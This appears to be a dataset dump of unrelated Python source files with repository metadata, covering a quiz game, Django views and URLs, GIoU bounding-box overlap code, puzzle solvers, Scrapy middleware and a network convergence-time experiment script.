options_list=[["1.four","2.nine","3.seven","4.eight"],["1.chandigarh","2.bhopal","3.chennai","4.delhi"],["1.software","2.counselling","3.tourism","4.agriculture"]]
solutions_list=[3,4,1]
lifeline_key=[["1.four","3.seven"],["1.chandigarh","4.delhi"],["1.software","2.counselling"]]
print("there is one lifeline key if you want you can use it by entering 5050")
c=0
i=0
while i<len(questions_list):
print(questions_list[i])
j=0
while j<len(options_list[i]):
print(options_list[i][j])
j=j+1
user=int(input("any number="))
if user==solutions_list[i]:
print("congress")
elif user==5050:
if c==0:
print(lifeline_key[i])
c=c+1
user1=int(input("any number="))
if user1==solutions_list[i]:
print("congrets")
else:
print("sadly")
else:
print("you used lifeline key, so please enter your answer")
user2=int(input("any number="))
if user2==solutions_list[i]:
print("your answer is correct")
else:
print("your answer is wrong")
else:
print("oops,your answer is wrong")
print("quite")
i=i+1
|
[
"kabita20@navgurukul.org"
] |
kabita20@navgurukul.org
|
1ec88640264888f044176603e9b77661bd321de8
|
bd9aed3c36d4e94d12314bc661d5f96cc55adf13
|
/mysite/polls/urls.py
|
afbf5d6cf0444399acfe015589caecd1d335515b
|
[] |
no_license
|
merry-hyelyn/Django_Tutorial
|
cf0a16f91993c8dddbe8c9464e44fec6e5f4168b
|
5dc7444fc77761f46ed31ba1489ab99ea8df3ed9
|
refs/heads/master
| 2022-09-12T14:35:29.685829
| 2020-05-30T14:12:38
| 2020-05-30T14:12:38
| 266,798,461
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
from django.urls import path
from . import views
app_name = 'polls'
urlpatterns = [
path('', views.IndexView.as_view(), name='index'),
path('<int:pk>/', views.DetialView.as_view(), name='detail'),
path('<int:pk>/results/', views.ResultVeiw.as_view(), name='results'),
path('<int:question_id>/vote/', views.vote, name='vote'),
]
|
[
"h1335@naver.com"
] |
h1335@naver.com
|
d4e32da54313c1944fb42ed8d569176df9d1148e
|
46f369e2fa03b44ebb0206532d6be92fb79c31e5
|
/util/util.py
|
62e48f17270d1e0bd9f5d4811131ade543f0f026
|
[
"MIT"
] |
permissive
|
w3eee/issue-task
|
944f438c41bb94ab0bb4a35929ba38c8b3ce843e
|
54fe9837d65a8a04fe6fb3b0eeced52fcb696ad3
|
refs/heads/master
| 2022-01-17T09:12:11.049332
| 2019-01-09T02:54:25
| 2019-01-09T02:54:25
| 17,831,031
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
py
|
# coding: utf8
import datetime
class Paginator(object):
_per_page = 15
_pi = 5
def __init__(self, page, num, per_page=None):
""" page: 当前页
num: 数量
per_page: 每一页数量
"""
page = int(page)
self.per_page = per_page or self._per_page
num = (num * 1.0) / per_page
if num > int(num):
num += 1
num = int(num)
self.num = num
self.page = page
@property
def pages(self):
prange = self._pi / 2
first = self.page - prange
last = self.page + prange
if first < 1:
last += 1 - first
first = 1
if last > self.num:
first -= last - self.num
last = self.num
if first < 1:
first = 1
return [i for i in range(first, last+1)]
@property
def prev(self):
prev = self.page - 1
return prev if prev > 0 else None
@property
def next(self):
next = self.page + 1
return None if next > self.num else next
def date_to_str(d, format='%Y-%m-%d %H:%M:%S'):
if not d or not isinstance(d, datetime.datetime):
return d
return d.strftime(format)
|
[
"gee@gee-ThinkPad-X200.(none)"
] |
gee@gee-ThinkPad-X200.(none)
|
b2cb9eed251f6fe7492541c21a4ee7a6a3bf1b34
|
df955822c4c0537e4937939bc20e11cb27af3394
|
/lib/model/rpn/bbox_transform_giou.py
|
917a1cce9656c4c64c8c378da1491074f68b68ba
|
[] |
no_license
|
only-someone/ML_BigWork
|
be29dbd6ee3c14417f3bb6efb8f5e1a3be0fdd66
|
da58cd33cc3b93b857cddfec24c28e074408d0c8
|
refs/heads/master
| 2020-09-07T19:38:38.942707
| 2019-11-11T14:51:04
| 2019-11-11T14:51:04
| 220,891,801
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,445
|
py
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# Reorganized and modified by Jianwei Yang and Jiasen Lu
# --------------------------------------------------------
import torch
import numpy as np
import pdb
def bbox_transform(ex_rois, gt_rois):
ex_widths = ex_rois[:, 2] - ex_rois[:, 0] + 1.0
ex_heights = ex_rois[:, 3] - ex_rois[:, 1] + 1.0
ex_ctr_x = ex_rois[:, 0] + 0.5 * ex_widths
ex_ctr_y = ex_rois[:, 1] + 0.5 * ex_heights
gt_widths = gt_rois[:, 2] - gt_rois[:, 0] + 1.0
gt_heights = gt_rois[:, 3] - gt_rois[:, 1] + 1.0
gt_ctr_x = gt_rois[:, 0] + 0.5 * gt_widths
gt_ctr_y = gt_rois[:, 1] + 0.5 * gt_heights
targets_dx = (gt_ctr_x - ex_ctr_x) / ex_widths
targets_dy = (gt_ctr_y - ex_ctr_y) / ex_heights
targets_dw = torch.log(gt_widths / ex_widths)
targets_dh = torch.log(gt_heights / ex_heights)
targets = torch.stack(
(targets_dx, targets_dy, targets_dw, targets_dh),1)
return targets
def bbox_transform_batch(ex_rois, gt_rois):
if ex_rois.dim() == 2:
ex_widths = ex_rois[:, 2] - ex_rois[:, 0] + 1.0
ex_heights = ex_rois[:, 3] - ex_rois[:, 1] + 1.0
ex_ctr_x = ex_rois[:, 0] + 0.5 * ex_widths
ex_ctr_y = ex_rois[:, 1] + 0.5 * ex_heights
gt_widths = gt_rois[:, :, 2] - gt_rois[:, :, 0] + 1.0
gt_heights = gt_rois[:, :, 3] - gt_rois[:, :, 1] + 1.0
gt_ctr_x = gt_rois[:, :, 0] + 0.5 * gt_widths
gt_ctr_y = gt_rois[:, :, 1] + 0.5 * gt_heights
targets_dx = (gt_ctr_x - ex_ctr_x.view(1,-1).expand_as(gt_ctr_x)) / ex_widths
targets_dy = (gt_ctr_y - ex_ctr_y.view(1,-1).expand_as(gt_ctr_y)) / ex_heights
targets_dw = torch.log(gt_widths / ex_widths.view(1,-1).expand_as(gt_widths))
targets_dh = torch.log(gt_heights / ex_heights.view(1,-1).expand_as(gt_heights))
elif ex_rois.dim() == 3:
ex_widths = ex_rois[:, :, 2] - ex_rois[:, :, 0] + 1.0
ex_heights = ex_rois[:,:, 3] - ex_rois[:,:, 1] + 1.0
ex_ctr_x = ex_rois[:, :, 0] + 0.5 * ex_widths
ex_ctr_y = ex_rois[:, :, 1] + 0.5 * ex_heights
gt_widths = gt_rois[:, :, 2] - gt_rois[:, :, 0] + 1.0
gt_heights = gt_rois[:, :, 3] - gt_rois[:, :, 1] + 1.0
gt_ctr_x = gt_rois[:, :, 0] + 0.5 * gt_widths
gt_ctr_y = gt_rois[:, :, 1] + 0.5 * gt_heights
targets_dx = (gt_ctr_x - ex_ctr_x) / ex_widths
targets_dy = (gt_ctr_y - ex_ctr_y) / ex_heights
targets_dw = torch.log(gt_widths / ex_widths)
targets_dh = torch.log(gt_heights / ex_heights)
else:
raise ValueError('ex_roi input dimension is not correct.')
targets = torch.stack(
(targets_dx, targets_dy, targets_dw, targets_dh),2)
return targets
def bbox_transform_inv(boxes, deltas, batch_size):
widths = boxes[:, :, 2] - boxes[:, :, 0] + 1.0
heights = boxes[:, :, 3] - boxes[:, :, 1] + 1.0
ctr_x = boxes[:, :, 0] + 0.5 * widths
ctr_y = boxes[:, :, 1] + 0.5 * heights
dx = deltas[:, :, 0::4]
dy = deltas[:, :, 1::4]
dw = deltas[:, :, 2::4]
dh = deltas[:, :, 3::4]
pred_ctr_x = dx * widths.unsqueeze(2) + ctr_x.unsqueeze(2)
pred_ctr_y = dy * heights.unsqueeze(2) + ctr_y.unsqueeze(2)
pred_w = torch.exp(dw) * widths.unsqueeze(2)
pred_h = torch.exp(dh) * heights.unsqueeze(2)
pred_boxes = deltas.clone()
# x1
pred_boxes[:, :, 0::4] = pred_ctr_x - 0.5 * pred_w
# y1
pred_boxes[:, :, 1::4] = pred_ctr_y - 0.5 * pred_h
# x2
pred_boxes[:, :, 2::4] = pred_ctr_x + 0.5 * pred_w
# y2
pred_boxes[:, :, 3::4] = pred_ctr_y + 0.5 * pred_h
return pred_boxes
def clip_boxes_batch(boxes, im_shape, batch_size):
"""
Clip boxes to image boundaries.
"""
num_rois = boxes.size(1)
boxes[boxes < 0] = 0
# batch_x = (im_shape[:,0]-1).view(batch_size, 1).expand(batch_size, num_rois)
# batch_y = (im_shape[:,1]-1).view(batch_size, 1).expand(batch_size, num_rois)
batch_x = im_shape[:, 1] - 1
batch_y = im_shape[:, 0] - 1
boxes[:,:,0][boxes[:,:,0] > batch_x] = batch_x
boxes[:,:,1][boxes[:,:,1] > batch_y] = batch_y
boxes[:,:,2][boxes[:,:,2] > batch_x] = batch_x
boxes[:,:,3][boxes[:,:,3] > batch_y] = batch_y
return boxes
def clip_boxes(boxes, im_shape, batch_size):
for i in range(batch_size):
boxes[i,:,0::4].clamp_(0, im_shape[i, 1]-1)
boxes[i,:,1::4].clamp_(0, im_shape[i, 0]-1)
boxes[i,:,2::4].clamp_(0, im_shape[i, 1]-1)
boxes[i,:,3::4].clamp_(0, im_shape[i, 0]-1)
return boxes
def bbox_overlaps(anchors, gt_boxes):
"""
anchors: (N, 4) ndarray of float
gt_boxes: (K, 4) ndarray of float
overlaps: (N, K) ndarray of overlap between boxes and query_boxes
"""
N = anchors.size(0)
K = gt_boxes.size(0)
gt_boxes_area = ((gt_boxes[:,2] - gt_boxes[:,0] + 1) *
(gt_boxes[:,3] - gt_boxes[:,1] + 1)).view(1, K)
anchors_area = ((anchors[:,2] - anchors[:,0] + 1) *
(anchors[:,3] - anchors[:,1] + 1)).view(N, 1)
boxes = anchors.view(N, 1, 4).expand(N, K, 4)
query_boxes = gt_boxes.view(1, K, 4).expand(N, K, 4)
iw = (torch.min(boxes[:,:,2], query_boxes[:,:,2]) -
torch.max(boxes[:,:,0], query_boxes[:,:,0]) + 1)
iw[iw < 0] = 0
ih = (torch.min(boxes[:,:,3], query_boxes[:,:,3]) -
torch.max(boxes[:,:,1], query_boxes[:,:,1]) + 1)
ih[ih < 0] = 0
ow = (torch.max(boxes[:, :, 2], query_boxes[:, :, 2]) -
torch.min(boxes[:, :, 0], query_boxes[:, :, 0]) + 1)
ow[iw < 0] = 0
oh = (torch.max(boxes[:, :, 3], query_boxes[:, :, 3]) -
torch.min(boxes[:, :, 1], query_boxes[:, :, 1]) + 1)
oh[ih < 0] = 0
ua = anchors_area + gt_boxes_area - (iw * ih)
iou = iw * ih / ua
oa=ow*oh
overlaps=iou-(oa-ua)/oa
return overlaps
def bbox_overlaps_batch(anchors, gt_boxes):
"""
anchors: (N, 4) ndarray of float
gt_boxes: (b, K, 5) ndarray of float
overlaps: (N, K) ndarray of overlap between boxes and query_boxes
"""
batch_size = gt_boxes.size(0)
if anchors.dim() == 2:
N = anchors.size(0)
K = gt_boxes.size(1)
anchors = anchors.view(1, N, 4).expand(batch_size, N, 4).contiguous()
gt_boxes = gt_boxes[:,:,:4].contiguous()
gt_boxes_x = (gt_boxes[:,:,2] - gt_boxes[:,:,0] + 1)
gt_boxes_y = (gt_boxes[:,:,3] - gt_boxes[:,:,1] + 1)
gt_boxes_area = (gt_boxes_x * gt_boxes_y).view(batch_size, 1, K)
anchors_boxes_x = (anchors[:,:,2] - anchors[:,:,0] + 1)
anchors_boxes_y = (anchors[:,:,3] - anchors[:,:,1] + 1)
anchors_area = (anchors_boxes_x * anchors_boxes_y).view(batch_size, N, 1)
gt_area_zero = (gt_boxes_x == 1) & (gt_boxes_y == 1)
anchors_area_zero = (anchors_boxes_x == 1) & (anchors_boxes_y == 1)
boxes = anchors.view(batch_size, N, 1, 4).expand(batch_size, N, K, 4)
query_boxes = gt_boxes.view(batch_size, 1, K, 4).expand(batch_size, N, K, 4)
iw = (torch.min(boxes[:,:,:,2], query_boxes[:,:,:,2]) -
torch.max(boxes[:,:,:,0], query_boxes[:,:,:,0]) + 1)
iw[iw < 0] = 0
ih = (torch.min(boxes[:,:,:,3], query_boxes[:,:,:,3]) -
torch.max(boxes[:,:,:,1], query_boxes[:,:,:,1]) + 1)
ih[ih < 0] = 0
ow = (torch.max(boxes[:, :, :, 2], query_boxes[:, :, :, 2]) -
torch.min(boxes[:, :, :, 0], query_boxes[:, :, :, 0]) + 1)
ow[iw < 0] = 0
oh = (torch.max(boxes[:, :, :, 3], query_boxes[:, :, :, 3]) -
torch.min(boxes[:, :, :, 1], query_boxes[:, :, :, 1]) + 1)
oh[ih < 0] = 0
ua = anchors_area + gt_boxes_area - (iw * ih)
iou = iw * ih / ua
oa = ow * oh
overlaps = iou - (oa - ua) / oa
# mask the overlap here.
overlaps.masked_fill_(gt_area_zero.view(batch_size, 1, K).expand(batch_size, N, K), 0)
overlaps.masked_fill_(anchors_area_zero.view(batch_size, N, 1).expand(batch_size, N, K), -1)
elif anchors.dim() == 3:
N = anchors.size(1)
K = gt_boxes.size(1)
if anchors.size(2) == 4:
anchors = anchors[:,:,:4].contiguous()
else:
anchors = anchors[:,:,1:5].contiguous()
gt_boxes = gt_boxes[:,:,:4].contiguous()
gt_boxes_x = (gt_boxes[:,:,2] - gt_boxes[:,:,0] + 1)
gt_boxes_y = (gt_boxes[:,:,3] - gt_boxes[:,:,1] + 1)
gt_boxes_area = (gt_boxes_x * gt_boxes_y).view(batch_size, 1, K)
anchors_boxes_x = (anchors[:,:,2] - anchors[:,:,0] + 1)
anchors_boxes_y = (anchors[:,:,3] - anchors[:,:,1] + 1)
anchors_area = (anchors_boxes_x * anchors_boxes_y).view(batch_size, N, 1)
gt_area_zero = (gt_boxes_x == 1) & (gt_boxes_y == 1)
anchors_area_zero = (anchors_boxes_x == 1) & (anchors_boxes_y == 1)
boxes = anchors.view(batch_size, N, 1, 4).expand(batch_size, N, K, 4)
query_boxes = gt_boxes.view(batch_size, 1, K, 4).expand(batch_size, N, K, 4)
iw = (torch.min(boxes[:,:,:,2], query_boxes[:,:,:,2]) -
torch.max(boxes[:,:,:,0], query_boxes[:,:,:,0]) + 1)
iw[iw < 0] = 0
ih = (torch.min(boxes[:,:,:,3], query_boxes[:,:,:,3]) -
torch.max(boxes[:,:,:,1], query_boxes[:,:,:,1]) + 1)
ih[ih < 0] = 0
ow = (torch.max(boxes[:, :, :, 2], query_boxes[:, :, :, 2]) -
torch.min(boxes[:, :, :, 0], query_boxes[:, :, :, 0]) + 1)
ow[iw < 0] = 0
oh = (torch.max(boxes[:, :, :, 3], query_boxes[:, :, :, 3]) -
torch.min(boxes[:, :, :, 1], query_boxes[:, :, :, 1]) + 1)
oh[ih < 0] = 0
ua = anchors_area + gt_boxes_area - (iw * ih)
# Intersection (iw * ih) divided by Union (ua)
iou = iw * ih / ua
oa = ow * oh
overlaps = iou - (oa - ua) / oa
# mask the overlap here.
overlaps.masked_fill_(gt_area_zero.view(batch_size, 1, K).expand(batch_size, N, K), 0)
overlaps.masked_fill_(anchors_area_zero.view(batch_size, N, 1).expand(batch_size, N, K), -1)
else:
raise ValueError('anchors input dimension is not correct.')
return overlaps
|
[
"490072639@qq.com"
] |
490072639@qq.com
|
83e9ac3986ea298378407f690db477e7f8e2ffda
|
cea9c5c319e6c6f4a30ecb9f26601868fa616989
|
/5_2.py
|
14177832135ab63644b4239ab7c4e082388436db
|
[] |
no_license
|
hamiltonisbest/leetcode
|
ce82d34015373b859d52f3d4b0c805d17bc8d005
|
228560ccb956a05e56f39a39896182159b416ac8
|
refs/heads/master
| 2021-01-19T19:27:14.221596
| 2017-07-15T09:00:56
| 2017-07-15T09:00:56
| 88,419,261
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 760
|
py
|
class Solution(object):
def longestPalindrome(self, s):
t = ['$', '#']
for c in s:
t.append(c)
t.append('#')
t.append('?')
farest, idx, max_len, center = 0, 0, 0, 0
p = [0] * len(t)
for i in xrange(1, len(t) - 1):
p[i] = min(p[2 * idx - i], farest - i) if farest > i else 1
while t[i + p[i]] == t[i - p[i]]:
p[i] += 1
if farest < i + p[i]:
farest = i + p[i]
idx = i
if max_len < p[i]:
max_len = p[i]
center = i
return s[(center - max_len) / 2 : (center - max_len) / 2 + max_len - 1]
solution = Solution()
print solution.longestPalindrome("babbb")
|
[
"hefubin@meituan.com"
] |
hefubin@meituan.com
|
12282492b324dc5fb815a1e908c1e257d7d835c8
|
154e563104144721865a90987db0332bef08a4c3
|
/old/filter_tiles.py
|
df21217c395d74d5e54fffb73b83175d0f3cffc5
|
[
"MIT"
] |
permissive
|
Rhoana/rh_aligner
|
565572d645769053c74a36ddf0f53ecc20d997fe
|
baab698f6520b9b999bccf423dc510b0c8f4b9bb
|
refs/heads/master
| 2021-01-01T05:29:25.406459
| 2016-05-09T15:34:58
| 2016-05-09T15:34:58
| 56,165,015
| 3
| 3
| null | 2016-05-05T20:00:26
| 2016-04-13T15:43:33
|
Python
|
UTF-8
|
Python
| false
| false
| 2,329
|
py
|
# Takes a json file that contains many tiles with their bounding boxes (Tile-Spec format)
# and a bounding box, and outputs a json file for each tile that is overlapping with the bounding box
import sys
import os
import argparse
import json
from bounding_box import BoundingBox
# common functions
def load_tiles(tiles_spec_fname, bbox):
relevant_tiles = []
with open(tiles_spec_fname, 'r') as data_file:
data = json.load(data_file)
for tile in data:
tile_bbox = BoundingBox.fromList(tile['bbox'])
if bbox.overlap(tile_bbox):
relevant_tiles.append(tile)
return relevant_tiles
def filter_tiles(tiles_fname, out_fname, bbox):
# parse the bounding box arguments
bbox = BoundingBox.fromStr(bbox)
# load all tiles from the tile-spec json file that are relevant to our bounding box
relevant_tiles = load_tiles(tiles_fname, bbox)
# Create a tile-spec file that includes all relevant tiles
with open(out_fname, 'w') as outfile:
json.dump(relevant_tiles, outfile, sort_keys=True, indent=4)
def main():
# Command line parser
parser = argparse.ArgumentParser(description='Takes a json file that contains many tiles with their bounding boxes (Tile-Spec format)\
and a bounding box, and outputs a json file for each tile that is overlapping with the bounding box')
parser.add_argument('tiles_fname', metavar='tiles_json', type=str,
help='a tile_spec file that contains all the images to be aligned in json format')
parser.add_argument('-o', '--output_file', type=str,
help='an output tile_spec file, that will include only the relevant tiles (default: ./filtered.json)',
default='./filtered.json')
# the default bounding box is as big as the image can be
parser.add_argument('-b', '--bounding_box', type=str,
help='the bounding box of the part of image that needs to be aligned format: "from_x to_x from_y to_y" (default: all tiles)',
default='{0} {1} {2} {3}'.format((-sys.maxint - 1), sys.maxint, (-sys.maxint - 1), sys.maxint))
args = parser.parse_args()
#print args
filter_tiles(args.tiles_fname, args.output_file, args.bounding_box)
if __name__ == '__main__':
main()
|
[
"adi.suissa@gmail.com"
] |
adi.suissa@gmail.com
|
cfa9e2a185a3da3b366a17ed07415144b6b77f5a
|
eb1332d3ee9fe70d5b6721cb83b9abdbd1114ac0
|
/article/views.py
|
a8c976b71705eef85b2eeffef904dbe7d191b3be
|
[] |
no_license
|
shreyasrk/articlerenderer
|
e6ab4ecdb9167bc39f66215f8266e1298ed9b024
|
f0b2424fb7c8d6024e92cbae66d65cf4edd5b146
|
refs/heads/master
| 2021-01-10T03:50:20.078967
| 2016-02-21T15:11:31
| 2016-02-21T15:11:31
| 52,163,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
from django.http import HttpResponse
from .models import Article
def index(request):
article_list = Article.objects.order_by('-publ_date')[:5]
response = HttpResponse(article_list, content_type='application/jpeg')
response['Content-Disposition'] = 'attachment; filename="foo.jpg"'
return response
|
[
"shrykulk.rk85@gmail.com"
] |
shrykulk.rk85@gmail.com
|
349a8a44db4d2c7ab13dd0914b926e0c6fc0592d
|
1e0f1a8d67534a5ebd17a73b816ae7f1f1e32a38
|
/Primer_1.py
|
33ec5851505902fce5ee8b8ec7a765db6a9bbe5e
|
[
"MIT"
] |
permissive
|
IsSveshuD/lab_6
|
616fb2c1a01a04d290f05fd2f761c23ba23eed13
|
017e48290f6215503cf90171fb4548e114bea8e6
|
refs/heads/main
| 2023-05-05T17:28:40.450446
| 2021-05-28T00:23:04
| 2021-05-28T00:23:04
| 371,535,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
if __name__ == '__main__':
# Ввести список одной строкой.
A = list(map(int, input().split()))
# Проверить количество элементов списка.
if len(A) != 10:
print("Неверный размер списка", file=sys.stderr)
exit(1)
# Найти искомую сумму.
s = 0
for item in A:
if abs(item) < 5:
s += item
print(s)
|
[
"ivan.ivan.lysenko@gmail.com"
] |
ivan.ivan.lysenko@gmail.com
|
4e05ce6b8464036952afc2136cc59c984053fdd8
|
6d32daf2b1bb339223c6eefeb94e1349f9499e36
|
/cvedetail/cvedetail/middlewares.py
|
2523a140f2d69120cae43c57d2e8ba96dda9e4a6
|
[
"MIT"
] |
permissive
|
bushubeke/systemic-vulnerability-risk-assessment
|
1b8b215abe9fd59abe04f8d550d86b578d223c1b
|
6bc35fb6666b4bc717e6c86f5383e6fd497196e6
|
refs/heads/main
| 2023-08-25T00:37:21.252033
| 2021-10-25T14:45:35
| 2021-10-25T14:45:35
| 407,853,856
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,654
|
py
|
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class CvedetailSpiderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, or item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request or item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class CvedetailDownloaderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
|
[
"beimdegefu@gmail.com"
] |
beimdegefu@gmail.com
|
0472d9609808fd374cdaf024935ffc7c22584d1b
|
683876019cad0b0d562ac7f9da8c679cb310cfb2
|
/2015/day09/part1.py
|
2c1ecb0a1661747d18c537bf6bbde9d5c92c7f98
|
[] |
no_license
|
CoachEd/advent-of-code
|
d028bc8c21235361ad31ea55922625adf743b5c8
|
10850d5d477c0946ef73756bfeb3a6db241cc4b2
|
refs/heads/master
| 2023-05-11T05:20:26.951224
| 2023-05-09T18:54:16
| 2023-05-09T18:54:16
| 160,375,311
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
import sys
import time
import itertools
start_secs = time.time()
print()
d=dict()
d['AlphaCentauri'] = 0
d['Snowdin'] = 1
d['Tambi'] = 2
d['Faerun'] = 3
d['Norrath'] = 4
d['Straylight'] = 5
d['Tristram'] = 6
d['Arbre'] = 7
cities = ['AlphaCentauri','Snowdin','Tambi','Faerun','Norrath','Straylight','Tristram','Arbre']
routes=list(itertools.permutations(cities))
l=[]
darr=[ [ 0 for c in range(8)] for r in range(8) ]
my_file = open("inp.txt", "r")
lines = my_file.readlines()
for line in lines:
l.append(line.strip())
for s in l:
arr = s.split('=')
arr2 = arr[0].strip().split()
dist=int(arr[1].strip())
r=d[arr2[0]]
c=d[arr2[2]]
darr[r][c] = dist
darr[c][r] = dist
mind = sys.maxsize
for r in routes:
newd=0
good = True
for i in range(0,len(r)-1):
c1=r[i]
c2=r[i+1]
row=d[c1]
col=d[c2]
if darr[row][col] == 0:
good = False
#print('no route from ' + c1 + ' to ' + c2)
break
newd = newd + darr[row][col]
if good and newd < mind:
mind = newd
print('part 1: '+str(mind))
#316 too high
print()
end_secs = time.time()
print(str(end_secs-start_secs))
|
[
"CoachEd@gmail.com"
] |
CoachEd@gmail.com
|
518a716768449feb3c7d3f19e8523613010117ac
|
00cd46c5722fbb4623d8cefc33bbce6e4c6bf970
|
/Stack/126.Max Tree/Solution_DFS.py
|
591fc46cebdc054d2df49542057bf05c3bed7232
|
[
"MIT"
] |
permissive
|
jxhangithub/lintcode
|
9126d0d951cdc69cd5f061799313f1a96ffe5ab8
|
afd79d790d0a7495d75e6650f80adaa99bd0ff07
|
refs/heads/master
| 2022-04-02T22:02:57.515169
| 2020-02-26T21:32:02
| 2020-02-26T21:32:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 867
|
py
|
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param A: Given an integer array with no duplicates.
@return: The root of max tree.
"""
def maxTree(self, A):
# write your code here
if not A or len(A) == 0:
return None
return self._findMaxTree(0, len(A) - 1, A)
def _findMaxTree(self, start, end, A):
if start > end:
return None
if start == end:
return TreeNode(A[start])
maxVal = max(A[start:end + 1])
maxValIdx = A[start:end + 1].index(maxVal) + start
root = TreeNode(maxVal)
root.left = self._findMaxTree(start, maxValIdx - 1, A)
root.right = self._findMaxTree(maxValIdx + 1, end, A)
return root
|
[
"32248549+Zhenye-Na@users.noreply.github.com"
] |
32248549+Zhenye-Na@users.noreply.github.com
|
a4fc322d49825ff1aeb43123352e24129e27d991
|
2fa28734d411aadbbe8ff7113bc5126e2f8a1ab9
|
/observation/tests/test_reducing.py
|
53dc3e44923e83e5220db61f8b2e69735d02e961
|
[
"MIT"
] |
permissive
|
pslustig/observation
|
9de8c55362a2f6a6c5b8c0ce8263646fa7369b2b
|
fd6356165ab66de72e1a3d0ba259eb56723afda3
|
refs/heads/master
| 2020-04-11T03:33:05.033286
| 2019-01-14T17:23:43
| 2019-01-14T17:23:43
| 161,481,637
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
import observation as obs
def test_band_from_filename():
name = 'gfvvewiv-U.fits'
band = obs.reducing.band_from_filename(name)
assert band == 'U'
def test_last_char_in_str():
name = '--'
assert obs.reducing.last_char_in_str(name, '-') == 1
|
[
"peter.lustig@physik.lmu.de"
] |
peter.lustig@physik.lmu.de
|
a475fe591275d1a60bdbce9c5d91fe11439c33ac
|
c0fba717fe308c732be069dbae4fdec7f1d0f21b
|
/run_ct_exp.py
|
6a869b8a4f84e7a2765c0573a4e5f74f57a33aa8
|
[] |
no_license
|
sibanez12/convergenceTime_exps
|
0bd94edc421af9e1bbc8d3da69ae7af19383f316
|
c079a5c32ba9cfff90dbb244b1eb23b0b6fd9aad
|
refs/heads/master
| 2021-01-13T15:27:32.590089
| 2017-05-10T01:30:42
| 2017-05-10T01:30:42
| 79,969,019
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,256
|
py
|
#!/usr/bin/env python
"""
This script runs the convergence time hardware experiments for
TCP and PERC.
The input is a flows.csv that contains entries with the format:
src_ip, dst_ip
Each entry in the flows.csv indicates one flow in the experiment.
This script performs the following functions:
1.) Detemines workload from flows.csv
2.) Runs rate monitoring service on each machine
3.) Distributes global time to start workload and starts workload
4.) After experiment, copies all log files to single location
5.) Computes correct flow rates for given topology and workload
6.) Analyzes log files to determine convergence time of each flow
7.) Reports results
Specifically for for the TCP experiment:
1.) Loads the tcp_probe kernel module on each machine
- directs the output to a tcp_probe.log file
2.) Starts an iperf server on each machine that will receive a flow
3.) Determines the global time (Tstart) that all of the iperf
clients should be started and distributes that time to each
machine.
4.) Tells Tstart to each source machine which then runs a thread that
sleeps until Tstart and then runs iperf.
5.) Experiment ends after all iperf clients finish.
6.) Copies all of the log files to a single location
7.) Computes the correct rates for each flow using Lavanya's
convergence time simulator tool
8.) Analyzes the tcp_probe.log files to determine the convergence time
of each flow
9.) Reports results
"""
import argparse
from workload import Workload
from ct_experiment_iperf import CT_Experiment
def main():
parser = argparse.ArgumentParser()
parser.add_argument('flowsFile', type=str, help="the txt file that contains the flows to run in the experiment")
args = parser.parse_args()
workload = Workload(args.flowsFile)
# starts the rate monitor on each host
# starts iperf server on each destination machine
exp = CT_Experiment(workload)
# get the global start time, distributed to each of the
# required hosts, and run the experiment
exp.runExperiment()
# copy all log files to a single location, parse the
# results to determine the convergence times
results = exp.getResults()
exp.reportResults(results)
if __name__ == "__main__":
main()
|
[
"sibanez@g.hmc.edu"
] |
sibanez@g.hmc.edu
|
ffbc4a827ac30bdf6603e580a2d84de62b02cbd8
|
